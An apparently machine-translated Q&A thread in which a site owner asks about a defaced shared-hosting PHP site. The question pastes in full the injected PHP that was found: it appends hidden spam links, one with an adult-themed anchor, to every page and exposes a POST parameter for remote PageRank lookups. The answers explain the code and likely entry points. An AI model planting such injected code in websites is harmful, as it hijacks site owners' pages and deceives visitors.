All geek questions in one place

My site has received a violation. How to protect yourself from shared hosting?

I have godaddy shared hosting and the site got defaced. who's guilty? the site was created using php, is it possible that a person can go through some vunerability on my site and change the file? or is it all server side that godaddy was not safe enough?

this is what was entered into the file. what is he doing

<?php //{{1311051f GLOBAL $alreadyxxx; if($alreadyxxx != 1) { $alreadyxxx = 1; $olderrxxx=error_reporting(0); function outputxxx_callback($str) { $links = '<SPAN STYLE="font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px;"><div id="rb4d41ca36473534443c002805"><a href="http://www.wcvi.org/community_development/ecogardners/fresh/blow-jobs-teen/blow-jobs-teen.html">blow jobs teen</a><br></div></SPAN>'; preg_match("|</body>|si",$str,$arr); return str_replace($arr[0],$links.$arr[0],$str); } function StrToNum($Str, $Check, $Magic) { $Int32Unit = 4294967296; $length = strlen($Str); for ($i = 0; $i < $length; $i++) { $Check *= $Magic; if ($Check >= $Int32Unit) { $Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit)); $Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check; } $Check += ord($Str{$i}); } return $Check; } function HashURL($String) { $Check1 = StrToNum($String, 0x1505, 0x21); $Check2 = StrToNum($String, 0, 0x1003F); $Check1 >>= 2; $Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F); $Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF); $Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF); $T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F ); $T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 ); return ($T1 | $T2); } function CheckHash($Hashnum) { $CheckByte = 0; $Flag = 0; $HashStr = sprintf('%u', $Hashnum) ; $length = strlen($HashStr); for ($i = $length-1; $i >= 0; $i--) { $Re = $HashStr{$i}; if (1 === ($Flag % 2)) { $Re += $Re; $Re = (int)($Re / 10) + ($Re % 10); } $CheckByte += $Re; $Flag ++; } $CheckByte %= 10; if (0 !== $CheckByte) { $CheckByte = 10 - $CheckByte; if (1 === ($Flag % 2) ) { if (1 === ($CheckByte % 2)) { $CheckByte += 9; } $CheckByte >>= 1; } } return '7'.$CheckByte.$HashStr; } function getpr($url) { $ch = CheckHash(HashURL($url)); $file = "http://toolbarqueries.google.com/search?client=navclient-auto&ch=$ch&features=Rank&q=info:$url";; $data = file_get_contents($file); $pos = strpos($data, "Rank_"); if($pos === false){return -1;} else{ $pr=substr($data, $pos + 9); $pr=trim($pr); $pr=str_replace(" ",'',$pr); return $pr; } } if(isset($_POST['xxxprch'])) { echo getpr($_POST['xxxprch']); exit(); } else ob_start('outputxxx_callback'); error_reporting($olderrxxx); } //}}75671d8f ?>
+4
source share
4 answers

Most likely, it was an exploit from the package that you use on your site (for example, phpBB, phpNuke, etc.), people browse web pages looking for vulnerable sites, and use those that can be used. The code is open source and easy to access, so you cannot really protect it other than using the latest version.

Companies such as PacketStormSecurity easily allow “skidd kiddies” to find a PoC (Proof of Concept) script, and they take it themselves should try it on every site that they can. Some of them are as easy as a google processed request to find a list of potential goals.

You can view your logs for the GET URL that led to the exploit, but the best-case scenario just remains as relevant as possible and never rely on your host to restore backups of your site.

+9
source

The real deal with this hack is here: http://frazierit.com/blog/?p=103

No SQL injection, no secret sauce, these guys didn’t listen to wires, or on some machine there is an agent to whom you use transmitting keystrokes, and you used a free FTP text password to work with your site. They got FTP access to your site and systematically injected code into the .php and .html pages on your site. They build / create a distributed network of page ranking testers through numerous Internet providers. Perhaps to check SEO actions. Easy to clean, you just need to perform regular expression on the command line.

-Drew

+1
source

The script allows someone to specify the URL of the script using the xxxprch variable. It checks the hash of the url to make sure it conforms to a specific standard and searches for the google url. He then checks to see if the word “rank_” is in the search results and receives the next 9 characters following “rank_” and returns them for display on the user's screen.

If the user does not specify a variable in xxxprch, it automatically writes out links to the page with the explicit website.

Note. If you get a virtual private server (it can be found as cheaply as $ 3 a month), you can set mod_security, which prevents many of these types of attacks. On the other hand, you will need to update the OS.

0
source

I hate talking about it, but you are to blame. SQL / HTML / JS / code injection is your responsibility. It is also important to choose a strong password. It is possible that anyone can find a vulnerability and do something.

It seems that this code introduces links and somehow gets the Google page rank for some reason.

I think it falls under one of the principles of a pragmatic programmer:

`` select Isnt Broken It is rare to find a bug in the OS or compiler, or even a third-party product or library. The probability of errors in the application.

Replace the OS / compiler / third-party library with shared hosting.

-7
source

Source: https://habr.com/ru/post/1338968/

More articles:


All Articles